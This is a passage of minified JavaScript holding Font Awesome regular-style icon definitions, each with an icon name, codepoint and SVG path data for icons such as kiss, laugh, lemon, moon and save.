12-12zm384 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zM122 188v-28c0-6.627-5.373-12-12-12H82c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm96 0v-28c0-6.627-5.373-12-12-12h-28c-6.627 0-12 5.373-12 12v28c0 6.627 5.373 12 12 12h28c6.627 0 12-5.373 12-12zm-98 158v-16c0-6.627-5.373-12-12-12H180c-6.627 0-12 5.373-12 12v16c0 6.627 5.373 12 12 12h216c6.627 0 12-5.373 12-12z"]},faKiss:{prefix:"far",iconName:"kiss",icon:[496,512,[],"f596","M168 176c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm136 132c0-19.2-28.8-41.5-71.5-44-3.8-.4-7.4 2.4-8.2 6.2-.9 3.8 1.1 7.7 4.7 9.2l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-5.7 2.4-6 12.2 0 14.8l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-3.6 1.5-5.6 5.4-4.7 9.2.8 3.6 4.1 6.2 7.8 6.2h.5c42.8-2.5 71.5-24.8 71.5-44 0-13-13.4-27.3-35.2-36C290.6 335.3 304 321 304 308zM248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm80-280c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32z"]},faKissBeam:{prefix:"far",iconName:"kiss-beam",icon:[496,512,[],"f597","M168 152c-23.8 0-52.7 29.3-56 71.4-.3 3.7 2 7.2 5.6 8.3 3.5 1 7.5-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 5.9-4.5 5.6-8.3-3.1-42.1-32-71.4-55.8-71.4zM248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm56-148c0-19.2-28.8-41.5-71.5-44-3.8-.4-7.4 2.4-8.2 6.2-.9 3.8 1.1 7.7 4.7 9.2l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-5.7 2.4-6 12.2 0 14.8l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-3.6 1.5-5.6 5.4-4.7 9.2.8 3.6 4.1 6.2 7.8 6.2h.5c42.8-2.5 71.5-24.8 71.5-44 0-13-13.4-27.3-35.2-36C290.6 335.3 304 321 304 308zm24-156c-23.8 0-52.7 29.3-56 71.4-.3 3.7 2 7.2 5.6 8.3 3.5 1 7.5-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 5.9-4.5 5.6-8.3-3.1-42.1-32-71.4-55.8-71.4z"]},faKissWinkHeart:{prefix:"far",iconName:"kiss-wink-heart",icon:[504,512,[],"f598","M304 308.5c0-19.2-28.8-41.5-71.5-44-3.8-.4-7.4 2.4-8.2 6.2-.9 3.8 1.1 7.7 4.7 9.2l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-5.7 2.4-6 12.2 0 14.8l16.9 7.2c13 5.5 20.8 13.5 20.8 21.5s-7.8 16-20.7 21.5l-17 7.2c-3.6 1.5-5.6 5.4-4.7 9.2.8 3.6 4.1 6.2 7.8 6.2h.5c42.8-2.5 71.5-24.8 71.5-44 0-13-13.4-27.3-35.2-36 21.7-9.1 35.1-23.4 35.1-36.4zm70.5-83.5l9.5 8.5c3.8 3.3 9.3 4 13.7 1.6 4.4-2.4 6.9-7.4 6.1-12.4-4-25.2-34.2-42.1-59.8-42.1s-55.9 16.9-59.8 42.1c-.8 5 1.7 10 6.1 12.4 5.8 3.1 11.2.7 13.7-1.6l9.5-8.5c14.8-13.2 46.2-13.2 61 0zM136 208.5c0 17.7 14.3 32 32 32s32-14.3 32-32-14.3-32-32-32-32 14.3-32 32zm365.1 194c-8-20.8-31.5-31.5-53.1-25.9l-8.4 2.2-2.3-8.4c-5.9-21.4-27-36.5-49-33-25.2 4-40.6 28.6-34 52.6l22.9 82.6c1.5 5.3 7 8.5 12.4 7.1l83-21.5c24.1-6.3 37.7-31.8 28.5-55.7zM334 436.3c-26.1 12.5-55.2 19.7-86 19.7-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200c0 22.1-3.7 43.3-10.4 63.2 9 6.4 17 14.2 22.6 23.9 6.4.1 12.6 1.4 18.6 2.9 10.9-27.9 17.1-58.2 17.1-90C496 119 385 8 248 8S0 119 0 256s111 248 248 248c35.4 0 68.9-7.5 99.4-20.9-2.5-7.3 4.3 17.2-13.4-46.8z"]},faLaugh:{prefix:"far",iconName:"laugh",icon:[496,512,[],"f599","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm141.4 389.4c-37.8 37.8-88 58.6-141.4 58.6s-103.6-20.8-141.4-58.6S48 309.4 48 256s20.8-103.6 58.6-141.4S194.6 56 248 56s103.6 20.8 141.4 58.6S448 202.6 448 256s-20.8 103.6-58.6 141.4zM328 224c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm-160 0c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm194.4 64H133.6c-8.2 0-14.5 7-13.5 15 7.5 59.2 58.9 105 121.1 105h13.6c62.2 0 113.6-45.8 121.1-105 1-8-5.3-15-13.5-15z"]},faLaughBeam:{prefix:"far",iconName:"laugh-beam",icon:[496,512,[],"f59a","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm141.4 389.4c-37.8 37.8-88 58.6-141.4 58.6s-103.6-20.8-141.4-58.6S48 309.4 48 256s20.8-103.6 58.6-141.4S194.6 56 248 56s103.6 20.8 141.4 58.6S448 202.6 448 256s-20.8 103.6-58.6 141.4zM328 152c-23.8 0-52.7 29.3-56 71.4-.7 8.6 10.8 11.9 14.9 4.5l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c4.1 7.4 15.6 4 14.9-4.5-3.1-42.1-32-71.4-55.8-71.4zm-201 75.9l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c4.1 7.4 15.6 4 14.9-4.5-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.6 8.5 10.9 11.9 15.1 4.5zM362.4 288H133.6c-8.2 0-14.5 7-13.5 15 7.5 59.2 58.9 105 121.1 105h13.6c62.2 0 113.6-45.8 121.1-105 1-8-5.3-15-13.5-15z"]},faLaughSquint:{prefix:"far",iconName:"laugh-squint",icon:[496,512,[],"f59b","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm141.4 389.4c-37.8 37.8-88 58.6-141.4 58.6s-103.6-20.8-141.4-58.6S48 309.4 48 256s20.8-103.6 58.6-141.4S194.6 56 248 56s103.6 20.8 141.4 58.6S448 202.6 448 256s-20.8 103.6-58.6 141.4zM343.6 196l33.6-40.3c8.6-10.3-3.8-24.8-15.4-18l-80 48c-7.8 4.7-7.8 15.9 0 20.6l80 48c11.5 6.8 24-7.6 15.4-18L343.6 196zm-209.4 58.3l80-48c7.8-4.7 7.8-15.9 0-20.6l-80-48c-11.6-6.9-24 7.7-15.4 18l33.6 40.3-33.6 40.3c-8.7 10.4 3.8 24.8 15.4 18zM362.4 288H133.6c-8.2 0-14.5 7-13.5 15 7.5 59.2 58.9 105 121.1 105h13.6c62.2 0 113.6-45.8 121.1-105 1-8-5.3-15-13.5-15z"]},faLaughWink:{prefix:"far",iconName:"laugh-wink",icon:[496,512,[],"f59c","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm141.4 389.4c-37.8 37.8-88 58.6-141.4 58.6s-103.6-20.8-141.4-58.6C68.8 359.6 48 309.4 48 256s20.8-103.6 58.6-141.4C144.4 76.8 194.6 56 248 56s103.6 20.8 141.4 58.6c37.8 37.8 58.6 88 58.6 141.4s-20.8 103.6-58.6 141.4zM328 164c-25.7 0-55.9 16.9-59.9 42.1-1.7 11.2 11.5 18.2 19.8 10.8l9.5-8.5c14.8-13.2 46.2-13.2 61 0l9.5 8.5c8.5 7.4 21.6.3 19.8-10.8-3.8-25.2-34-42.1-59.7-42.1zm-160 60c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm194.4 64H133.6c-8.2 0-14.5 7-13.5 15 7.5 59.2 58.9 105 121.1 105h13.6c62.2 0 113.6-45.8 121.1-105 1-8-5.3-15-13.5-15z"]},faLemon:{prefix:"far",iconName:"lemon",icon:[512,512,[],"f094","M484.112 27.889C455.989-.233 416.108-8.057 387.059 8.865 347.604 31.848 223.504-41.111 91.196 91.197-41.277 223.672 31.923 347.472 8.866 387.058c-16.922 29.051-9.1 68.932 19.022 97.054 28.135 28.135 68.011 35.938 97.057 19.021 39.423-22.97 163.557 49.969 295.858-82.329 132.474-132.477 59.273-256.277 82.331-295.861 16.922-29.05 9.1-68.931-19.022-97.054zm-22.405 72.894c-38.8 66.609 45.6 165.635-74.845 286.08-120.44 120.443-219.475 36.048-286.076 74.843-22.679 13.207-64.035-27.241-50.493-50.488 38.8-66.609-45.6-165.635 74.845-286.08C245.573 4.702 344.616 89.086 411.219 50.292c22.73-13.24 64.005 27.288 50.488 50.491zm-169.861 8.736c1.37 10.96-6.404 20.957-17.365 22.327-54.846 6.855-135.779 87.787-142.635 142.635-1.373 10.989-11.399 18.734-22.326 17.365-10.961-1.37-18.735-11.366-17.365-22.326 9.162-73.286 104.167-168.215 177.365-177.365 10.953-1.368 20.956 6.403 22.326 17.364z"]},faLifeRing:{prefix:"far",iconName:"life-ring",icon:[512,512,[],"f1cd","M256 504c136.967 0 248-111.033 248-248S392.967 8 256 8 8 119.033 8 256s111.033 248 248 248zm-103.398-76.72l53.411-53.411c31.806 13.506 68.128 13.522 99.974 0l53.411 53.411c-63.217 38.319-143.579 38.319-206.796 0zM336 256c0 44.112-35.888 80-80 80s-80-35.888-80-80 35.888-80 80-80 80 35.888 80 80zm91.28 103.398l-53.411-53.411c13.505-31.806 13.522-68.128 0-99.974l53.411-53.411c38.319 63.217 38.319 143.579 0 206.796zM359.397 84.72l-53.411 53.411c-31.806-13.505-68.128-13.522-99.973 0L152.602 84.72c63.217-38.319 143.579-38.319 206.795 0zM84.72 152.602l53.411 53.411c-13.506 31.806-13.522 68.128 0 99.974L84.72 359.398c-38.319-63.217-38.319-143.579 0-206.796z"]},faLightbulb:{prefix:"far",iconName:"lightbulb",icon:[352,512,[],"f0eb","M176 80c-52.94 0-96 43.06-96 96 0 8.84 7.16 16 16 16s16-7.16 16-16c0-35.3 28.72-64 64-64 8.84 0 16-7.16 16-16s-7.16-16-16-16zM96.06 459.17c0 3.15.93 6.22 2.68 8.84l24.51 36.84c2.97 4.46 7.97 7.14 13.32 7.14h78.85c5.36 0 10.36-2.68 13.32-7.14l24.51-36.84c1.74-2.62 2.67-5.7 2.68-8.84l.05-43.18H96.02l.04 43.18zM176 0C73.72 0 0 82.97 0 176c0 44.37 16.45 84.85 43.56 115.78 16.64 18.99 42.74 58.8 52.42 92.16v.06h48v-.12c-.01-4.77-.72-9.51-2.15-14.07-5.59-17.81-22.82-64.77-62.17-109.67-20.54-23.43-31.52-53.15-31.61-84.14-.2-73.64 59.67-128 127.95-128 70.58 0 128 57.42 128 128 0 30.97-11.24 60.85-31.65 84.14-39.11 44.61-56.42 91.47-62.1 109.46a47.507 47.507 0 0 0-2.22 14.3v.1h48v-.05c9.68-33.37 35.78-73.18 52.42-92.16C335.55 260.85 352 220.37 352 176 352 78.8 273.2 0 176 0z"]},faListAlt:{prefix:"far",iconName:"list-alt",icon:[512,512,[],"f022","M464 32H48C21.49 32 0 53.49 0 80v352c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V80c0-26.51-21.49-48-48-48zm-6 400H54a6 6 0 0 1-6-6V86a6 6 0 0 1 6-6h404a6 6 0 0 1 6 6v340a6 6 0 0 1-6 6zm-42-92v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm0-96v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm0-96v24c0 6.627-5.373 12-12 12H204c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h200c6.627 0 12 5.373 12 12zm-252 12c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36zm0 96c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36zm0 96c0 19.882-16.118 36-36 36s-36-16.118-36-36 16.118-36 36-36 36 16.118 36 36z"]},faMap:{prefix:"far",iconName:"map",icon:[576,512,[],"f279","M560.02 32c-1.96 0-3.98.37-5.96 1.16L384.01 96H384L212 35.28A64.252 64.252 0 0 0 191.76 32c-6.69 0-13.37 1.05-19.81 3.14L20.12 87.95A32.006 32.006 0 0 0 0 117.66v346.32C0 473.17 7.53 480 15.99 480c1.96 0 3.97-.37 5.96-1.16L192 416l172 60.71a63.98 63.98 0 0 0 40.05.15l151.83-52.81A31.996 31.996 0 0 0 576 394.34V48.02c0-9.19-7.53-16.02-15.98-16.02zM224 90.42l128 45.19v285.97l-128-45.19V90.42zM48 418.05V129.07l128-44.53v286.2l-.64.23L48 418.05zm480-35.13l-128 44.53V141.26l.64-.24L528 93.95v288.97z"]},faMeh:{prefix:"far",iconName:"meh",icon:[496,512,[],"f11a","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-80-216c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160-64c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm8 144H160c-13.2 0-24 10.8-24 24s10.8 24 24 24h176c13.2 0 24-10.8 24-24s-10.8-24-24-24z"]},faMehBlank:{prefix:"far",iconName:"meh-blank",icon:[496,512,[],"f5a4","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-80-280c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm160 0c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32z"]},faMehRollingEyes:{prefix:"far",iconName:"meh-rolling-eyes",icon:[496,512,[],"f5a5","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm88-304c-39.8 0-72 32.2-72 72s32.2 72 72 72 72-32.2 72-72-32.2-72-72-72zm0 112c-22.1 0-40-17.9-40-40 0-13.6 7.3-25.1 17.7-32.3-1 2.6-1.7 5.3-1.7 8.3 0 13.3 10.7 24 24 24s24-10.7 24-24c0-2.9-.7-5.7-1.7-8.3 10.4 7.2 17.7 18.7 17.7 32.3 0 22.1-17.9 40-40 40zm-104-40c0-39.8-32.2-72-72-72s-72 32.2-72 72 32.2 72 72 72 72-32.2 72-72zm-112 0c0-13.6 7.3-25.1 17.7-32.3-1 2.6-1.7 5.3-1.7 8.3 0 13.3 10.7 24 24 24s24-10.7 24-24c0-2.9-.7-5.7-1.7-8.3 10.4 7.2 17.7 18.7 17.7 32.3 0 22.1-17.9 40-40 40s-40-17.9-40-40zm192 128H184c-13.2 0-24 10.8-24 24s10.8 24 24 24h128c13.2 0 24-10.8 24-24s-10.8-24-24-24z"]},faMinusSquare:{prefix:"far",iconName:"minus-square",icon:[448,512,[],"f146","M108 284c-6.6 0-12-5.4-12-12v-32c0-6.6 5.4-12 12-12h232c6.6 0 12 5.4 12 12v32c0 6.6-5.4 12-12 12H108zM448 80v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faMoneyBillAlt:{prefix:"far",iconName:"money-bill-alt",icon:[640,512,[],"f3d1","M320 144c-53.02 0-96 50.14-96 112 0 61.85 42.98 112 96 112 53 0 96-50.13 96-112 0-61.86-42.98-112-96-112zm40 168c0 4.42-3.58 8-8 8h-64c-4.42 0-8-3.58-8-8v-16c0-4.42 3.58-8 8-8h16v-55.44l-.47.31a7.992 7.992 0 0 1-11.09-2.22l-8.88-13.31a7.992 7.992 0 0 1 2.22-11.09l15.33-10.22a23.99 23.99 0 0 1 13.31-4.03H328c4.42 0 8 3.58 8 8v88h16c4.42 0 8 3.58 8 8v16zM608 64H32C14.33 64 0 78.33 0 96v320c0 17.67 14.33 32 32 32h576c17.67 0 32-14.33 32-32V96c0-17.67-14.33-32-32-32zm-16 272c-35.35 0-64 28.65-64 64H112c0-35.35-28.65-64-64-64V176c35.35 0 64-28.65 64-64h416c0 35.35 28.65 64 64 64v160z"]},faMoon:{prefix:"far",iconName:"moon",icon:[512,512,[],"f186","M279.135 512c78.756 0 150.982-35.804 198.844-94.775 28.27-34.831-2.558-85.722-46.249-77.401-82.348 15.683-158.272-47.268-158.272-130.792 0-48.424 26.06-92.292 67.434-115.836 38.745-22.05 28.999-80.788-15.022-88.919A257.936 257.936 0 0 0 279.135 0c-141.36 0-256 114.575-256 256 0 141.36 114.576 256 256 256zm0-464c12.985 0 25.689 1.201 38.016 3.478-54.76 31.163-91.693 90.042-91.693 157.554 0 113.848 103.641 199.2 215.252 177.944C402.574 433.964 344.366 464 279.135 464c-114.875 0-208-93.125-208-208s93.125-208 208-208z"]},faNewspaper:{prefix:"far",iconName:"newspaper",icon:[576,512,[],"f1ea","M552 64H112c-20.858 0-38.643 13.377-45.248 32H24c-13.255 0-24 10.745-24 24v272c0 30.928 25.072 56 56 56h496c13.255 0 24-10.745 24-24V88c0-13.255-10.745-24-24-24zM48 392V144h16v248c0 4.411-3.589 8-8 8s-8-3.589-8-8zm480 8H111.422c.374-2.614.578-5.283.578-8V112h416v288zM172 280h136c6.627 0 12-5.373 12-12v-96c0-6.627-5.373-12-12-12H172c-6.627 0-12 5.373-12 12v96c0 6.627 5.373 12 12 12zm28-80h80v40h-80v-40zm-40 140v-24c0-6.627 5.373-12 12-12h136c6.627 0 12 5.373 12 12v24c0 6.627-5.373 12-12 12H172c-6.627 0-12-5.373-12-12zm192 0v-24c0-6.627 5.373-12 12-12h104c6.627 0 12 5.373 12 12v24c0 6.627-5.373 12-12 12H364c-6.627 0-12-5.373-12-12zm0-144v-24c0-6.627 5.373-12 12-12h104c6.627 0 12 5.373 12 12v24c0 6.627-5.373 12-12 12H364c-6.627 0-12-5.373-12-12zm0 72v-24c0-6.627 5.373-12 12-12h104c6.627 0 12 5.373 12 12v24c0 6.627-5.373 12-12 12H364c-6.627 0-12-5.373-12-12z"]},faObjectGroup:{prefix:"far",iconName:"object-group",icon:[512,512,[],"f247","M500 128c6.627 0 12-5.373 12-12V44c0-6.627-5.373-12-12-12h-72c-6.627 0-12 5.373-12 12v12H96V44c0-6.627-5.373-12-12-12H12C5.373 32 0 37.373 0 44v72c0 6.627 5.373 12 12 12h12v256H12c-6.627 0-12 5.373-12 12v72c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-12h320v12c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-72c0-6.627-5.373-12-12-12h-12V128h12zm-52-64h32v32h-32V64zM32 64h32v32H32V64zm32 384H32v-32h32v32zm416 0h-32v-32h32v32zm-40-64h-12c-6.627 0-12 5.373-12 12v12H96v-12c0-6.627-5.373-12-12-12H72V128h12c6.627 0 12-5.373 12-12v-12h320v12c0 6.627 5.373 12 12 12h12v256zm-36-192h-84v-52c0-6.628-5.373-12-12-12H108c-6.627 0-12 5.372-12 12v168c0 6.628 5.373 12 12 12h84v52c0 6.628 5.373 12 12 12h200c6.627 0 12-5.372 12-12V204c0-6.628-5.373-12-12-12zm-268-24h144v112H136V168zm240 176H232v-24h76c6.627 0 12-5.372 12-12v-76h56v112z"]},faObjectUngroup:{prefix:"far",iconName:"object-ungroup",icon:[576,512,[],"f248","M564 224c6.627 0 12-5.373 12-12v-72c0-6.627-5.373-12-12-12h-72c-6.627 0-12 5.373-12 12v12h-88v-24h12c6.627 0 12-5.373 12-12V44c0-6.627-5.373-12-12-12h-72c-6.627 0-12 5.373-12 12v12H96V44c0-6.627-5.373-12-12-12H12C5.373 32 0 37.373 0 44v72c0 6.627 5.373 12 12 12h12v160H12c-6.627 0-12 5.373-12 12v72c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-12h88v24h-12c-6.627 0-12 5.373-12 12v72c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-12h224v12c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-72c0-6.627-5.373-12-12-12h-12V224h12zM352 64h32v32h-32V64zm0 256h32v32h-32v-32zM64 352H32v-32h32v32zm0-256H32V64h32v32zm32 216v-12c0-6.627-5.373-12-12-12H72V128h12c6.627 0 12-5.373 12-12v-12h224v12c0 6.627 5.373 12 12 12h12v160h-12c-6.627 0-12 5.373-12 12v12H96zm128 136h-32v-32h32v32zm280-64h-12c-6.627 0-12 5.373-12 12v12H256v-12c0-6.627-5.373-12-12-12h-12v-24h88v12c0 6.627 5.373 12 12 12h72c6.627 0 12-5.373 12-12v-72c0-6.627-5.373-12-12-12h-12v-88h88v12c0 6.627 5.373 12 12 12h12v160zm40 64h-32v-32h32v32zm0-256h-32v-32h32v32z"]},faPaperPlane:n,faPauseCircle:{prefix:"far",iconName:"pause-circle",icon:[512,512,[],"f28b","M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm96-280v160c0 8.8-7.2 16-16 16h-48c-8.8 0-16-7.2-16-16V176c0-8.8 7.2-16 16-16h48c8.8 0 16 7.2 16 16zm-112 0v160c0 8.8-7.2 16-16 16h-48c-8.8 0-16-7.2-16-16V176c0-8.8 7.2-16 16-16h48c8.8 0 16 7.2 16 16z"]},faPlayCircle:{prefix:"far",iconName:"play-circle",icon:[512,512,[],"f144","M371.7 238l-176-107c-15.8-8.8-35.7 2.5-35.7 21v208c0 18.4 19.8 29.8 35.7 21l176-101c16.4-9.1 16.4-32.8 0-42zM504 256C504 119 393 8 256 8S8 119 8 256s111 248 248 248 248-111 248-248zm-448 0c0-110.5 89.5-200 200-200s200 89.5 200 200-89.5 200-200 200S56 366.5 56 256z"]},faPlusSquare:{prefix:"far",iconName:"plus-square",icon:[448,512,[],"f0fe","M352 240v32c0 6.6-5.4 12-12 12h-88v88c0 6.6-5.4 12-12 12h-32c-6.6 0-12-5.4-12-12v-88h-88c-6.6 0-12-5.4-12-12v-32c0-6.6 5.4-12 12-12h88v-88c0-6.6 5.4-12 12-12h32c6.6 0 12 5.4 12 12v88h88c6.6 0 12 5.4 12 12zm96-160v352c0 26.5-21.5 48-48 48H48c-26.5 0-48-21.5-48-48V80c0-26.5 21.5-48 48-48h352c26.5 0 48 21.5 48 48zm-48 346V86c0-3.3-2.7-6-6-6H54c-3.3 0-6 2.7-6 6v340c0 3.3 2.7 6 6 6h340c3.3 0 6-2.7 6-6z"]},faQuestionCircle:{prefix:"far",iconName:"question-circle",icon:[512,512,[],"f059","M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 448c-110.532 0-200-89.431-200-200 0-110.495 89.472-200 200-200 110.491 0 200 89.471 200 200 0 110.53-89.431 200-200 200zm107.244-255.2c0 67.052-72.421 68.084-72.421 92.863V300c0 6.627-5.373 12-12 12h-45.647c-6.627 0-12-5.373-12-12v-8.659c0-35.745 27.1-50.034 47.579-61.516 17.561-9.845 28.324-16.541 28.324-29.579 0-17.246-21.999-28.693-39.784-28.693-23.189 0-33.894 10.977-48.942 29.969-4.057 5.12-11.46 6.071-16.666 2.124l-27.824-21.098c-5.107-3.872-6.251-11.066-2.644-16.363C184.846 131.491 214.94 112 261.794 112c49.071 0 101.45 38.304 101.45 88.8zM298 368c0 23.159-18.841 42-42 42s-42-18.841-42-42 18.841-42 42-42 42 18.841 42 42z"]},faRegistered:{prefix:"far",iconName:"registered",icon:[512,512,[],"f25d","M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 448c-110.532 0-200-89.451-200-200 0-110.531 89.451-200 200-200 110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200zm110.442-81.791c-53.046-96.284-50.25-91.468-53.271-96.085 24.267-13.879 39.482-41.563 39.482-73.176 0-52.503-30.247-85.252-101.498-85.252h-78.667c-6.617 0-12 5.383-12 12V380c0 6.617 5.383 12 12 12h38.568c6.617 0 12-5.383 12-12v-83.663h31.958l47.515 89.303a11.98 11.98 0 0 0 10.593 6.36h42.81c9.14 0 14.914-9.799 10.51-17.791zM256.933 239.906h-33.875v-64.14h27.377c32.417 0 38.929 12.133 38.929 31.709-.001 20.913-11.518 32.431-32.431 32.431z"]},faSadCry:{prefix:"far",iconName:"sad-cry",icon:[496,512,[],"f5b3","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm144 386.4V280c0-13.2-10.8-24-24-24s-24 10.8-24 24v151.4C315.5 447 282.8 456 248 456s-67.5-9-96-24.6V280c0-13.2-10.8-24-24-24s-24 10.8-24 24v114.4c-34.6-36-56-84.7-56-138.4 0-110.3 89.7-200 200-200s200 89.7 200 200c0 53.7-21.4 102.5-56 138.4zM205.8 234.5c4.4-2.4 6.9-7.4 6.1-12.4-4-25.2-34.2-42.1-59.8-42.1s-55.9 16.9-59.8 42.1c-.8 5 1.7 10 6.1 12.4 4.4 2.4 9.9 1.8 13.7-1.6l9.5-8.5c14.8-13.2 46.2-13.2 61 0l9.5 8.5c2.5 2.3 7.9 4.8 13.7 1.6zM344 180c-25.7 0-55.9 16.9-59.8 42.1-.8 5 1.7 10 6.1 12.4 4.5 2.4 9.9 1.8 13.7-1.6l9.5-8.5c14.8-13.2 46.2-13.2 61 0l9.5 8.5c2.5 2.2 8 4.7 13.7 1.6 4.4-2.4 6.9-7.4 6.1-12.4-3.9-25.2-34.1-42.1-59.8-42.1zm-96 92c-30.9 0-56 28.7-56 64s25.1 64 56 64 56-28.7 56-64-25.1-64-56-64z"]},faSadTear:{prefix:"far",iconName:"sad-tear",icon:[496,512,[],"f5b4","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm8-152c-13.2 0-24 10.8-24 24s10.8 24 24 24c23.8 0 46.3 10.5 61.6 28.8 8.1 9.8 23.2 11.9 33.8 3.1 10.2-8.5 11.6-23.6 3.1-33.8C330 320.8 294.1 304 256 304zm-88-64c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160-64c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm-165.6 98.8C151 290.1 126 325.4 126 342.9c0 22.7 18.8 41.1 42 41.1s42-18.4 42-41.1c0-17.5-25-52.8-36.4-68.1-2.8-3.7-8.4-3.7-11.2 0z"]},faSave:{prefix:"far",iconName:"save",icon:[448,512,[],"f0c7","M433.941 129.941l-83.882-83.882A48 48 0 0 0 316.118 32H48C21.49 32 0 53.49 0 80v352c0 26.51 21.49 48 48 48h352c26.51 0 48-21.49 48-48V163.882a48 48 0 0 0-14.059-33.941zM272 80v80H144V80h128zm122 352H54a6 6 0 0 1-6-6V86a6 6 0 0 1 6-6h42v104c0 13.255 10.745 24 24 24h176c13.255 0 24-10.745 24-24V83.882l78.243 78.243a6 6 0 0 1 1.757 4.243V426a6 6 0 0 1-6 6zM224 232c-48.523 0-88 39.477-88 88s39.477 88 88 88 88-39.477 88-88-39.477-88-88-88zm0 128c-22.056 0-40-17.944-40-40s17.944-40 40-40 40 17.944 40 40-17.944 40-40 